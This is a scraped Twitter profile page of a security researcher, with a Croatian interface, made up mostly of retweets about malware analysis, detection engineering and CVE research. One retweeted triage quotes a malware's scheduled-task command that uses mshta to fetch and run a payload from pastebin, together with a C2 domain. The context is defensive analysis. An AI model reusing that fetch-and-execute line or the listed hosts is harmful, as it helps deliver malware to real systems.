edx

@criznash

security, drum and bass, stuff and things. AHAtian, w00er, professional hard chatter. moderator @ - blog @

Austin, TX
Vrijeme pridruživanja: ožujak 2011.

Tweetovi

Blokirali ste korisnika/cu @criznash

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @criznash

  1. Prikvačeni tweet
    5. pro 2018.

    i promised forthcoming public research when i announced joining and my first contribution came with my first ever CVE credit for CVE-2018-15982! Massive thanks to and from my team and to for quickly patching the issue! 😁😁😁

    Poništi
  2. proslijedio/la je Tweet

    "We have an obligation to read aloud to our children. To read them things they enjoy. To read to them stories we are already tired of." from for .

    Poništi
  3. proslijedio/la je Tweet
    prije 21 sat

    So is moving away from "Installing" & "Installed" DebugStrings to some random strings utilizing CryptGenRandom, sandbox vendors good luck!

    Poništi
  4. proslijedio/la je Tweet
    3. velj

    VB6 Packers are no joke, This one took me a while to write and I do hope you enjoy it! Analyzing Modern Malware Techniques - Part 3 Vb6 packers

    Poništi
  5. proslijedio/la je Tweet
    3. velj

    ICYMI announced a kernel mode anticheat engine ( ) They mention no surveillance capabilities (prove it) & others are doing it (true) My question: How much code, developers, and involvement in this? Asking for a friend

    Poništi
  6. proslijedio/la je Tweet
    29. sij

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    1. velj
    Poništi
  8. proslijedio/la je Tweet

    Here are the slides from my . I fixed a few typos and added links and resources.

    Poništi
  9. proslijedio/la je Tweet
    31. sij

    The fact that malware created over a decade ago is in the top 3 detected in 2019 should help illustrate the crumbling aqueduct off technical debt that still festers unpaid in today’s Internet.

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    31. sij
    Poništi
  12. proslijedio/la je Tweet
    30. sij
    Poništi
  13. proslijedio/la je Tweet
    30. sij

    TrickBot gtag MAN1 if you want the history of why me and THL talk about MAN1 -> a paper I wrote using lots data sets that had been gathered over the years!

    Poništi
  14. proslijedio/la je Tweet

    People of the Internet (esp. twitter), I am pleased to announce the launch of the at ! (just in time for !)

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    29. sij
    Poništi
  16. proslijedio/la je Tweet
    28. sij

    1\ Surprisingly, you could build a very mediocre PE malware detector with a single PE feature: the PE compile timestamp. In fact, I built a little random forest detector that uses only the timestamp as its feature that gets 62% detection on previously unseen malware at a 1% FPR.

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    27. sij
    Odgovor korisniku/ci

    “Give me your solvent, your rested, your rugged individualists, yearning to avoid taxes.”

    Poništi
  18. proslijedio/la je Tweet
    27. sij

    Here's a simple, cheap detection for some publicly available dos/RCE tools for the "BlueGate" RDP gateway vuln. Look for JA3=2e29256489ce9efe000820389e24b2fd on UDP 3391. CVE-2020-0609 & CVE-2020-0610 use DTLS, which / parse into ssl.log just fine.

    Poništi
  19. proslijedio/la je Tweet
    27. sij

    I wrote a bit about hunting for UEFI Implants, and realising that we’re failing as an industry -- along with some ideas of things we could do to fix it. Comments welcome, especially from and ...

    Poništi
  20. 27. sij

    Adware is a joke to many organizations, to the point that they straight up ignore adware infections. The exposure is no joke, though. Some adware is highly sophisticated and feature-packed, and I’m only surprised we don’t see/hear of more cases like this.

    Poništi
  21. proslijedio/la je Tweet
    27. sij

    GreyNoise has been observing this as well. We call these Discovery Attacks. TL;DR Someone hits every server on the internet with something unique then traces back where they sent each request to find collectors Operationalized by (I believe) the Muhstik botnet recently

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·